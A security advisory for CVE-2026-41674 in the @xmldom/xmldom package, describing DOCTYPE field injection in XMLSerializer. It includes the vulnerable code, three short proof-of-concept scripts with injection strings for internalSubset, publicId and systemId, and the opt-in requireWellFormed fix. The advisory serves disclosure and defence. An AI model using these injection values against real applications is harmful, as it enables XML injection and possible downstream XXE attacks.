CVE-2026-41674
ADVISORY - githubSummary
Summary
The package serializes DocumentType node fields (internalSubset, publicId, systemId) verbatim
without any escaping or validation. When these fields are set programmatically to attacker-controlled
strings, XMLSerializer.serializeToString can produce output where the DOCTYPE declaration is
terminated early and arbitrary markup appears outside it.
Details
DOMImplementation.createDocumentType(qualifiedName, publicId, systemId, internalSubset) validates
only qualifiedName against the XML QName production. The remaining three arguments are stored
as-is with no validation.
The XMLSerializer emits DocumentType nodes as:
<!DOCTYPE name[ PUBLIC pubid][ SYSTEM sysid][ [internalSubset]]>
All fields are pushed into the output buffer verbatim — no escaping, no quoting added.
internalSubset injection: The serializer wraps internalSubset with [ and ]. A value
containing ]> closes the internal subset and the DOCTYPE declaration at the injection point.
Any content after ]> in internalSubset appears outside the DOCTYPE in the serialized output as
raw XML markup. Reported by @TharVid (GHSA-f6ww-3ggp-fr8h). Affected: @xmldom/xmldom ≥ 0.9.0
via createDocumentType API; 0.8.x only via direct property write.
publicId injection: The serializer emits publicId verbatim after PUBLIC with no
quoting added. A value containing an injected system identifier (e.g.,
"pubid" SYSTEM "evil") breaks the intended quoting context, injecting a fake SYSTEM entry
into the serialized DOCTYPE declaration. Identified during internal security research. Affected:
both branches, all versions back to 0.1.0.
systemId injection: The serializer emits systemId verbatim. A value containing >
terminates the DOCTYPE declaration early; content after > appears as raw XML markup outside
the DOCTYPE context. Identified during internal security research. Affected: both branches, all
versions back to 0.1.0.
The parse path is safe: the SAX parser enforces the PubidLiteral and SystemLiteral grammar
productions, which exclude the relevant characters, and the internal subset parser only accepts a
subset it can structurally validate. The vulnerability is reachable only through programmatic
createDocumentType calls with attacker-controlled arguments.
Affected code
lib/dom.js — createDocumentType (lines 898–910):
createDocumentType: function (qualifiedName, publicId, systemId, internalSubset) {
validateQualifiedName(qualifiedName); // only qualifiedName is validated
var node = new DocumentType(PDC);
node.name = qualifiedName;
node.nodeName = qualifiedName;
node.publicId = publicId || ''; // stored verbatim
node.systemId = systemId || ''; // stored verbatim
node.internalSubset = internalSubset || ''; // stored verbatim
node.childNodes = new NodeList();
return node;
},
lib/dom.js — serializer DOCTYPE case (lines 2948–2964):
case DOCUMENT_TYPE_NODE:
var pubid = node.publicId;
var sysid = node.systemId;
buf.push(g.DOCTYPE_DECL_START, ' ', node.name);
if (pubid) {
buf.push(' ', g.PUBLIC, ' ', pubid);
if (sysid && sysid !== '.') {
buf.push(' ', sysid);
}
} else if (sysid && sysid !== '.') {
buf.push(' ', g.SYSTEM, ' ', sysid);
}
if (node.internalSubset) {
buf.push(' [', node.internalSubset, ']'); // internalSubset emitted verbatim
}
buf.push('>');
return;
PoC
internalSubset injection
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
'root',
'',
'',
']><injected/><![CDATA['
);
const doc = impl.createDocument(null, 'root', doctype);
const xml = new XMLSerializer().serializeToString(doc);
console.log(xml);
// <!DOCTYPE root []><injected/><![CDATA[]><root/>
// ^^^^^^^^^^ injected element outside DOCTYPE
publicId quoting context break
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
'root',
'"injected PUBLIC_ID" SYSTEM "evil"',
'',
''
);
const doc = impl.createDocument(null, 'root', doctype);
console.log(new XMLSerializer().serializeToString(doc));
// <!DOCTYPE root PUBLIC "injected PUBLIC_ID" SYSTEM "evil"><root/>
// quoting context broken — SYSTEM entry injected
systemId injection
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
'root',
'',
'"sysid"><injected attr="pwn"/>',
''
);
const doc = impl.createDocument(null, 'root', doctype);
console.log(new XMLSerializer().serializeToString(doc));
// <!DOCTYPE root SYSTEM "sysid"><injected attr="pwn"/>><root/>
// > in sysid closes DOCTYPE early; <injected/> appears as sibling element
Impact
An application that programmatically constructs DocumentType nodes from user-controlled data and
then serializes the document can emit a DOCTYPE declaration where the internal subset is closed
early or where injected SYSTEM entities or other declarations appear in the serialized output.
Downstream XML parsers that re-parse the serialized output and expand entities from the injected DOCTYPE declarations may be susceptible to XXE-class attacks if they enable entity expansion.
Fix Applied
⚠ Opt-in required. Protection is not automatic. Existing serialization calls remain vulnerable unless
{ requireWellFormed: true }is explicitly passed. Applications that pass untrusted data tocreateDocumentType()or write untrusted values directly to aDocumentTypenode'spublicId,systemId, orinternalSubsetproperties should audit allserializeToString()call sites and add the option.
XMLSerializer.serializeToString() now accepts an options object as a second argument. When { requireWellFormed: true } is passed, the serializer validates the DocumentType node's publicId, systemId, and internalSubset fields before emitting the DOCTYPE declaration and throws InvalidStateError if any field contains an injection sequence:
publicId: throws if non-empty and does not match the XMLPubidLiteralproduction (XML 1.0 [12])systemId: throws if non-empty and does not match the XMLSystemLiteralproduction (XML 1.0 [11])internalSubset: throws if it contains]>(which closes the internal subset and DOCTYPE declaration early)
All three checks apply regardless of how the invalid value entered the node — whether via createDocumentType arguments or a subsequent direct property write.
PoC — fixed path
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
// internalSubset injection
const dt1 = impl.createDocumentType('root', '', '', ']><injected/><![CDATA[');
const doc1 = impl.createDocument(null, 'root', dt1);
// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc1));
// <!DOCTYPE root []><injected/><![CDATA[]><root/>
// Opt-in guard: throws InvalidStateError
try {
new XMLSerializer().serializeToString(doc1, { requireWellFormed: true });
} catch (e) {
console.log(e.name, e.message);
// InvalidStateError: DocumentType internalSubset contains "]>"
}
The guard also covers post-creation property writes:
const dt2 = impl.createDocumentType('root', '', '');
dt2.systemId = '"sysid"><injected attr="pwn"/>';
const doc2 = impl.createDocument(null, 'root', dt2);
new XMLSerializer().serializeToString(doc2, { requireWellFormed: true });
// InvalidStateError: DocumentType systemId is not a valid SystemLiteral
Why the default stays verbatim
The W3C DOM Parsing and Serialization spec §3.2.1.3 defines a require well-formed flag whose default value is false. With the flag unset, the spec permits verbatim serialization of DOCTYPE fields. Unconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in requireWellFormed: true flag allows applications that require injection safety to enable strict mode without breaking existing deployments.
Residual limitation
createDocumentType(qualifiedName, publicId, systemId[, internalSubset]) does not validate publicId, systemId, or internalSubset at creation time. This creation-time validation is a breaking change and is deferred to a future breaking release.
When the default serialization path is used (without requireWellFormed: true), all three fields are still emitted verbatim. Applications that do not pass requireWellFormed: true remain exposed.
Common Weakness Enumeration (CWE)
XML Injection (aka Blind XPath Injection)
XML Injection (aka Blind XPath Injection)
Sign in to Docker Scout
See which of your images are affected by this CVE and how to fix them by signing into Docker Scout.
Sign in